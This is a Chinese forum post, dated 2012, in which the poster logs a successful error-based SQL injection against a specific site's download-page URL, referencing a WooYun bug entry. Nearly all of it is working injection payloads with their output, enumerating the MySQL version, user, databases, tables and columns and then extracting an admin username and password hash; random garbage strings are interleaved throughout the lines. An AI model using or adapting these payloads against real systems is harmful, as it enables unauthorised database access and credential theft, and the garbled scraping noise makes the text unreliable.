http://www.wooyun.org/bugs/wooyun-2010-01666
$ N+ f! E% v, p* V4 M8 E# j0 V( N9 s6 @, n
之前想找个测试 没想到这有 可以测试下做个记录而已
" e! L: k# Z- X: |% e6 s8 q) K3 b8 m
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
# `$ [- G. M% a& C# u; L. \* g+ K3 U/ c* i' R! W v* i: s: h2 l
/data0/htdocs/leqi_new/app/myapp.php
5 Z6 s7 f3 c* M, w: p
) E. g# ^! k1 f5 H- R 或者
! o- z$ L! L @0 a" e# E, e6 J
" o% G$ W8 t/ c9 C4 g. X& L# o/**********version()**********/ 5.1.49-log
6 y3 P9 {* V% g! B+ B3 {http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ ~; P E$ O4 ~9 {+ v: ~/ p5 t1 R: z% V5 G8 V$ m/ |6 X( f
/**********user()**********/
0 m8 T+ y) V( Y9 N# B* _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 U* z$ @3 z/ z* x( t
2 R1 B/ r" q1 h/ K3 \
/**********database()**********/ leqi2 L6 ?% u3 g9 c2 _6 U' }/ g1 v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& L* o7 H' X$ b$ V) I E7 Y1 _4 l
/**********limit依次递归爆库**********/
0 E1 c9 i! w( \' g! I0 V! Thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 ~# e( M, E2 j" ?: einformation_schema3 {, u$ T' w- f: A. `& G5 i
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 Z, F5 y% b) w: t3 `. \; h
leqi
: f2 N! x$ z. v. b/ u* o$ `! A) L2 X7 Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! H0 M* Y) p) T0 F
test! u" d8 A8 H' J5 |* M
6 i9 ^& f! [% |( f& l9 Y- A
/**********limit依次递归爆表名**********/
7 m' V4 j9 {* s4 xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) e+ @8 Q/ _0 q/ d/ V; Jusers
+ k. @% y) m6 V5 D2 r% F# A" U
+ _ _# i( c& I( u5 r2 v/**********limit依次递归爆字段名**********/
4 S) Z9 _) z3 z9 n; Rhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 z& k0 N3 M4 p/ b1 S1 J2 y
user_id,username,nickname,passwd,group_id) l- K6 ^6 _" E0 L& n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23, d/ ?* i( b0 A
/wapc/5000_0005_003
4 X S& U5 F: M4 \( E11 21
3 v& c" p- V/ |: ]% q( ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, g/ E7 L: v4 t- x& L/wapc/5000_0005_003& u- S4 F: A: Y
11 341 351 361
2 l7 r% i3 q! W% Q0 J5 \; d/**********爆数据**********/
* F- S. k4 V& U$ z) h H1 nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%231 \* p! {3 v% M+ A( t
admin
# Z* G: c% e! b4 j" Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
1 u& j; V) ]1 Q1 s$ ]% H/ E6a8b4574ca231eb8bd52764d4978ffcd8 Z, s* W% ]( }5 s1 y
3 \8 {8 F: T! Z! z3 [- p: P+ o
5 g" N+ }% A, i6 ~
|
发表于 2012-9-13 17:52:09
收藏
支持
反对